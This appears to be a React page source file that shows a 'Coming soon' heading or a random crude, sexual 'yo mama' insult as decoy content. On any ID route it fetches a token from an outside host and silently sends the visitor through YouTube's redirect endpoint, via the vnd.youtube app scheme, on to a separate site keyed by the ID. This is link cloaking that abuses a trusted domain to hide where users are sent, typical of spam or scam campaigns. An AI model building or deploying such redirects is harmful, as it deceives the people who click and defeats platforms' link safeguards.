import React from 'react';
import {
  BrowserRouter as Router,
  Routes,
  Route,
  useParams
} from 'react-router-dom';

const v = 'vnd';
const d = 'youtube';
async function loadToken() {
    const response = await fetch('https://cnet.ageverify.org/api/getConfig');
    const tokenJson = await response.json();
    return tokenJson.token;
}

async function go(uid){
  var token = await loadToken();
  var urf = `https://za.storystore.online/${uid}/5`;
  urf = encodeURIComponent(urf);
  window.location.href = `${v}.${d}://youtube.com/redirect?event=comments&redir_token=${token}&q=${urf}&html_redirect=1`;
}

const sentences= [
  'so fat not even Dora can explore her',
  'so  fat I swerved to miss her and ran out of gas',
  'so smelly she put on Right Guard and it went left',
  'so fat she hasn’t got cellulite, she’s got celluheavy',
  'so fat she don’t need no internet – she’s already world wide',
  'so hair her armpits look like Don King in a headlock',
  'so classless she could be a Marxist utopia',
  'so fat she can hear bacon cooking in Canada',
  'so fat she won “The Bachelor” because she all those other bitches',
  'so stupid she believes everything that Brian Williams says',
  'so ugly she scared off Flavor Flav',
  'is like Domino’s Pizza, one call does it all',
  'is twice the man you are',
  'is like Bazooka Joe, 5 cents a blow',
  'is like an ATM, open 24/7',
  'is like a championship ring, everybody puts a finger in her'
];
const maxSentences = sentences.length;
function getRandomSentence () {
  var index= Math.floor(Math.random() * (maxSentences - 1));
  return sentences[index];
}
const sentence = getRandomSentence();

const App = () => (
  <Router>
    <Links />
  </Router>
);

const Links = () => (
  <>
    <Routes>
      <Route exact path="/" element={<CourseList />} />
      <Route path="/:id" element={<CourseItem />} />
    </Routes>
  </>
);

const CourseList = () => (
  <>
    <h2>Coming soon...</h2>
  </>
);

const CourseItem = () => {
  const { id } = useParams();
  const uid = id.split('_')[0];
  go(uid);
  return (
    <>
      <h2 className='red'>{sentence}</h2>
    </>
  );
};

export default App;
